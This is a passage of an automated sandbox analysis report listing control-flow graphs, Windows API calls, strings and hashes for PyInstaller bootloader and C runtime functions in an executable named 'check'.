218->235 219->218 224 7ff7124f3da1-7ff7124f3da5 219->224 226 7ff7124f3cbf-7ff7124f3cc6 220->226 227 7ff7124f3cc8-7ff7124f3ccf 220->227 221->165 222->159 224->218 230 7ff7124f3da7-7ff7124f3dbe SetDllDirectoryW LoadLibraryExW 224->230 226->210 227->213 228->222 229->213 230->218 234->235 238 7ff7124f3f01-7ff7124f3f08 235->238 239 7ff7124f3e0a-7ff7124f3e19 call 7ff7124f8830 235->239 242 7ff7124f3f0e-7ff7124f3f15 238->242 243 7ff7124f4008-7ff7124f4010 238->243 250 7ff7124f3e32-7ff7124f3e3c call 7ff712504f30 239->250 251 7ff7124f3e1b-7ff7124f3e21 239->251 242->243 246 7ff7124f3f1b-7ff7124f3f25 call 7ff7124f33c0 242->246 247 7ff7124f4035-7ff7124f4067 call 7ff7124f36a0 call 7ff7124f3360 call 7ff7124f3670 call 7ff7124f6fc0 call 7ff7124f6d70 243->247 248 7ff7124f4012-7ff7124f402f PostMessageW GetMessageW 243->248 246->222 260 7ff7124f3f2b-7ff7124f3f3f call 7ff7124f90c0 246->260 248->247 262 7ff7124f3ef2-7ff7124f3efc call 7ff7124f8940 250->262 263 7ff7124f3e42-7ff7124f3e48 250->263 254 7ff7124f3e23-7ff7124f3e2b 251->254 255 7ff7124f3e2d-7ff7124f3e2f 251->255 254->255 255->250 269 7ff7124f3f64-7ff7124f3fa0 call 7ff7124f8940 call 7ff7124f89e0 call 7ff7124f6fc0 call 7ff7124f6d70 call 7ff7124f88e0 260->269 270 7ff7124f3f41-7ff7124f3f5e PostMessageW GetMessageW 260->270 262->238 263->262 268 7ff7124f3e4e-7ff7124f3e54 263->268 272 7ff7124f3e56-7ff7124f3e58 268->272 273 7ff7124f3e5f-7ff7124f3e61 268->273 308 7ff7124f3fa5-7ff7124f3fa7 269->308 270->269 276 7ff7124f3e5a 272->276 277 7ff7124f3e67-7ff7124f3e83 call 7ff7124f6dc0 call 7ff7124f7340 272->277 273->238 273->277 276->238 289 7ff7124f3e85-7ff7124f3e8c 277->289 290 7ff7124f3e8e-7ff7124f3e95 277->290 292 7ff7124f3edb-7ff7124f3ef0 call 7ff7124f2a50 call 7ff7124f6fc0 call 7ff7124f6d70 289->292 293 7ff7124f3eaf-7ff7124f3eb9 call 7ff7124f71b0 290->293 294 7ff7124f3e97-7ff7124f3ea4 call 7ff7124f6e00 290->294 292->238 306 7ff7124f3ec4-7ff7124f3ed2 call 7ff7124f74f0 293->306 307 7ff7124f3ebb-7ff7124f3ec2 293->307 294->293 305 7ff7124f3ea6-7ff7124f3ead 294->305 305->292 306->238 319 7ff7124f3ed4 306->319 307->292 311 7ff7124f3ff5-7ff7124f4003 call 7ff7124f1900 308->311 312 7ff7124f3fa9-7ff7124f3fbf call 7ff7124f8ed0 call 7ff7124f88e0 308->312 311->222 312->311 323 7ff7124f3fc1-7ff7124f3fd6 312->323 319->292 324 7ff7124f3ff0 call 7ff7124f2a50 323->324 325 7ff7124f3fd8-7ff7124f3feb call 7ff7124f2710 call 7ff7124f1900 323->325 324->311 325->222
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                          • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                          • Opcode ID: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
                                                                                                                                                                                                                                          • Instruction ID: 13a1cf9cfc0490d70509ab780e1adc8d9ddc2affd3ac70d1af915af003fb0ca4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83326021B0CEC251FB15FB2994553B9AA91AF847A0FC44072DE5D432D6EFACE96CC321
                                                                                                                                                                                                                                          Function 00007FF712515C00 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 479 7ff712515c00-7ff712515c3b call 7ff712515588 call 7ff712515590 call 7ff7125155f8 486 7ff712515c41-7ff712515c4c call 7ff712515598 479->486 487 7ff712515e65-7ff712515eb1 call 7ff71250a900 call 7ff712515588 call 7ff712515590 call 7ff7125155f8 479->487 486->487 492 7ff712515c52-7ff712515c5c 486->492 512 7ff712515eb7-7ff712515ec2 call 7ff712515598 487->512 513 7ff712515fef-7ff71251605d call 7ff71250a900 call 7ff712511578 487->513 494 7ff712515c7e-7ff712515c82 492->494 495 7ff712515c5e-7ff712515c61 492->495 498 7ff712515c85-7ff712515c8d 494->498 497 7ff712515c64-7ff712515c6f 495->497 500 7ff712515c7a-7ff712515c7c 497->500 501 7ff712515c71-7ff712515c78 497->501 498->498 502 7ff712515c8f-7ff712515ca2 call 7ff71250d5fc 498->502 500->494 504 7ff712515cab-7ff712515cb9 500->504 501->497 501->500 510 7ff712515cba-7ff712515cc6 call 7ff71250a948 502->510 511 7ff712515ca4-7ff712515ca6 call 7ff71250a948 502->511 520 7ff712515ccd-7ff712515cd5 510->520 511->504 512->513 522 7ff712515ec8-7ff712515ed3 call 7ff7125155c8 512->522 533 7ff71251606b-7ff71251606e 513->533 534 7ff71251605f-7ff712516066 513->534 520->520 523 7ff712515cd7-7ff712515ce8 call 7ff712510474 520->523 522->513 531 7ff712515ed9-7ff712515efc call 7ff71250a948 GetTimeZoneInformation 522->531 523->487 532 7ff712515cee-7ff712515d44 call 7ff71251a4d0 * 4 call 7ff712515b1c 523->532 548 7ff712515f02-7ff712515f23 531->548 549 7ff712515fc4-7ff712515fee call 7ff712515580 call 7ff712515570 call 7ff712515578 531->549 591 7ff712515d46-7ff712515d4a 532->591 535 7ff712516070 533->535 536 7ff7125160a5-7ff7125160b8 call 7ff71250d5fc 533->536 539 7ff7125160fb-7ff7125160fe 534->539 540 7ff712516073 535->540 555 7ff7125160ba 536->555 556 7ff7125160c3-7ff7125160de call 7ff712511578 536->556 539->540 541 7ff712516104-7ff71251610c call 7ff712515c00 539->541 545 7ff712516078-7ff7125160a4 call 7ff71250a948 call 7ff7124fc550 540->545 546 7ff712516073 call 7ff712515e7c 540->546 541->545 546->545 553 7ff712515f2e-7ff712515f35 548->553 554 7ff712515f25-7ff712515f2b 548->554 562 7ff712515f37-7ff712515f3f 553->562 563 7ff712515f49 553->563 554->553 564 7ff7125160bc-7ff7125160c1 call 7ff71250a948 555->564 578 7ff7125160e0-7ff7125160e3 556->578 579 7ff7125160e5-7ff7125160f7 call 7ff71250a948 556->579 562->563 570 7ff712515f41-7ff712515f47 562->570 567 7ff712515f4b-7ff712515fbf call 7ff71251a4d0 * 4 call 7ff712512b5c call 7ff712516114 * 2 563->567 564->535 567->549 570->567 578->564 579->539 593 7ff712515d4c 591->593 594 7ff712515d50-7ff712515d54 591->594 593->594 594->591 596 7ff712515d56-7ff712515d7b call 7ff712506b58 594->596 602 7ff712515d7e-7ff712515d82 596->602 604 7ff712515d91-7ff712515d95 602->604 605 7ff712515d84-7ff712515d8f 602->605 604->602 605->604 607 7ff712515d97-7ff712515d9b 605->607 610 7ff712515e1c-7ff712515e20 607->610 611 7ff712515d9d-7ff712515dc5 call 7ff712506b58 607->611 612 7ff712515e27-7ff712515e34 610->612 613 7ff712515e22-7ff712515e24 610->613 618 7ff712515dc7 611->618 619 7ff712515de3-7ff712515de7 611->619 616 7ff712515e4f-7ff712515e5e call 7ff712515580 call 7ff712515570 612->616 617 7ff712515e36-7ff712515e4c call 7ff712515b1c 612->617 613->612 616->487 617->616 623 7ff712515dca-7ff712515dd1 618->623 619->610 625 7ff712515de9-7ff712515e07 call 7ff712506b58 619->625 623->619 626 7ff712515dd3-7ff712515de1 623->626 631 7ff712515e13-7ff712515e1a 625->631 626->619 626->623 631->610 632 7ff712515e09-7ff712515e0d 631->632 632->610 633 7ff712515e0f 632->633 633->631
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515C45
                                                                                                                                                                                                                                            • Part of subcall function 00007FF712515598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7125155AC
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: RtlFreeHeap.NTDLL(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A95E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: GetLastError.KERNEL32(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A968
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF71250A8DF,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250A909
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF71250A8DF,?,?,?,?,?,00007FF71250A7CA), ref: 00007FF71250A92E
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515C34
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7125155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71251560C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515EAA
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515EBB
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515ECC
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF71251610C), ref: 00007FF712515EF3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                          • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                          • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                          • Instruction ID: 93481a503800abafbd4be4194f86b3e5cce9f863cada2d1c5842c354bea1f4af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46D1D326F08A4246E720BF25E8C11B9A351FF847B8FC98175EA0D47695DFBCE849C760
                                                                                                                                                                                                                                          Function 00007FF712516964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 693 7ff712516964-7ff7125169d7 call 7ff712516698 696 7ff7125169d9-7ff7125169e2 call 7ff712504ee8 693->696 697 7ff7125169f1-7ff7125169fb call 7ff712508520 693->697 702 7ff7125169e5-7ff7125169ec call 7ff712504f08 696->702 703 7ff7125169fd-7ff712516a14 call 7ff712504ee8 call 7ff712504f08 697->703 704 7ff712516a16-7ff712516a7f CreateFileW 697->704 717 7ff712516d32-7ff712516d52 702->717 703->702 705 7ff712516afc-7ff712516b07 GetFileType 704->705 706 7ff712516a81-7ff712516a87 704->706 712 7ff712516b09-7ff712516b44 GetLastError call 7ff712504e7c CloseHandle 705->712 713 7ff712516b5a-7ff712516b61 705->713 709 7ff712516ac9-7ff712516af7 GetLastError call 7ff712504e7c 706->709 710 7ff712516a89-7ff712516a8d 706->710 709->702 710->709 715 7ff712516a8f-7ff712516ac7 CreateFileW 710->715 712->702 728 7ff712516b4a-7ff712516b55 call 7ff712504f08 712->728 720 7ff712516b69-7ff712516b6c 713->720 721 7ff712516b63-7ff712516b67 713->721 715->705 715->709 722 7ff712516b72-7ff712516bc7 call 7ff712508438 720->722 723 7ff712516b6e 720->723 721->722 731 7ff712516bc9-7ff712516bd5 call 7ff7125168a0 722->731 732 7ff712516be6-7ff712516c17 call 7ff712516418 722->732 723->722 728->702 731->732 738 7ff712516bd7 731->738 739 7ff712516c19-7ff712516c1b 732->739 740 7ff712516c1d-7ff712516c5f 732->740 741 7ff712516bd9-7ff712516be1 call 7ff71250aac0 738->741 739->741 742 7ff712516c81-7ff712516c8c 740->742 743 7ff712516c61-7ff712516c65 740->743 741->717 745 7ff712516d30 742->745 746 7ff712516c92-7ff712516c96 742->746 743->742 744 7ff712516c67-7ff712516c7c 743->744 744->742 745->717 746->745 748 7ff712516c9c-7ff712516ce1 CloseHandle CreateFileW 746->748 750 7ff712516ce3-7ff712516d11 GetLastError call 7ff712504e7c call 7ff712508660 748->750 751 7ff712516d16-7ff712516d2b 748->751 750->751 751->745
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                                          • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                          • Instruction ID: 9d793bcebb9820c0151182275b16c511ee14b60cf496184f33455bab8c33df73
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1C1F036B28E428AEB10EFA5C4806AC7761FB49BA8F814275DE1E573D4DF78D059C320
                                                                                                                                                                                                                                          Function 00007FF7124F83C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F842B
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84AE
                                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84CD
                                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84DB
                                                                                                                                                                                                                                          • FindClose.KERNEL32(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84EC
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNELBASE(?,00007FF7124F8919,00007FF7124F3FA5), ref: 00007FF7124F84F5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                          • String ID: %s\*
                                                                                                                                                                                                                                          • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                          • Opcode ID: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                          • Instruction ID: 2fa65c9a665bdd242f8f1fa2d4fee73d271b5ebdbec547f78dad87419e254311
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5413D21A0CD5295FB20AF28E4941BAB360FBD4764FC00232ED9D46698EFACD95DC720
                                                                                                                                                                                                                                          Function 00007FF712515E7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1014 7ff712515e7c-7ff712515eb1 call 7ff712515588 call 7ff712515590 call 7ff7125155f8 1021 7ff712515eb7-7ff712515ec2 call 7ff712515598 1014->1021 1022 7ff712515fef-7ff71251605d call 7ff71250a900 call 7ff712511578 1014->1022 1021->1022 1027 7ff712515ec8-7ff712515ed3 call 7ff7125155c8 1021->1027 1034 7ff71251606b-7ff71251606e 1022->1034 1035 7ff71251605f-7ff712516066 1022->1035 1027->1022 1033 7ff712515ed9-7ff712515efc call 7ff71250a948 GetTimeZoneInformation 1027->1033 1047 7ff712515f02-7ff712515f23 1033->1047 1048 7ff712515fc4-7ff712515fee call 7ff712515580 call 7ff712515570 call 7ff712515578 1033->1048 1036 7ff712516070 1034->1036 1037 7ff7125160a5-7ff7125160b8 call 7ff71250d5fc 1034->1037 1039 7ff7125160fb-7ff7125160fe 1035->1039 1040 7ff712516073 1036->1040 1053 7ff7125160ba 1037->1053 1054 7ff7125160c3-7ff7125160de call 7ff712511578 1037->1054 1039->1040 1041 7ff712516104-7ff71251610c call 7ff712515c00 1039->1041 1044 7ff712516078-7ff7125160a4 call 7ff71250a948 call 7ff7124fc550 1040->1044 1045 7ff712516073 call 7ff712515e7c 1040->1045 1041->1044 1045->1044 1051 7ff712515f2e-7ff712515f35 1047->1051 1052 7ff712515f25-7ff712515f2b 1047->1052 1059 7ff712515f37-7ff712515f3f 1051->1059 1060 7ff712515f49 1051->1060 1052->1051 1061 7ff7125160bc-7ff7125160c1 call 7ff71250a948 1053->1061 1072 7ff7125160e0-7ff7125160e3 1054->1072 1073 7ff7125160e5-7ff7125160f7 call 7ff71250a948 1054->1073 1059->1060 1066 7ff712515f41-7ff712515f47 1059->1066 1063 7ff712515f4b-7ff712515fbf call 7ff71251a4d0 * 4 call 7ff712512b5c call 7ff712516114 * 2 1060->1063 1061->1036 1063->1048 1066->1063 1072->1061 1073->1039
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515EAA
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7125155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71251560C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515EBB
                                                                                                                                                                                                                                            • Part of subcall function 00007FF712515598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7125155AC
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF712515ECC
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7125155C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7125155DC
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: RtlFreeHeap.NTDLL(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A95E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF71250A948: GetLastError.KERNEL32(?,?,?,00007FF712512D22,?,?,?,00007FF712512D5F,?,?,00000000,00007FF712513225,?,?,?,00007FF712513157), ref: 00007FF71250A968
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF71251610C), ref: 00007FF712515EF3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                          • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                          • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                          • Instruction ID: 43560cb39cdfb61ec7095fca75e4095eac9c04942407765997ea7f39760bb279
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18518332B18A4286E710FF21E8C15A9E760FB887A8FC55175EA4D43796DFBCE448C760
                                                                                                                                                                                                                                          Function 00007FF7124F9280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                                          • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                          • Instruction ID: f102be3be1262ad0f5a563cf48079da30169def0fb55f0480335955de7b6ac2e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F0AF36A18A4286F7A0AF64B4C8766B390AB84338F850635DE6D06AD4DFBCD45DCA04
                                                                                                                                                                                                                                          Function 00007FF7125108C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
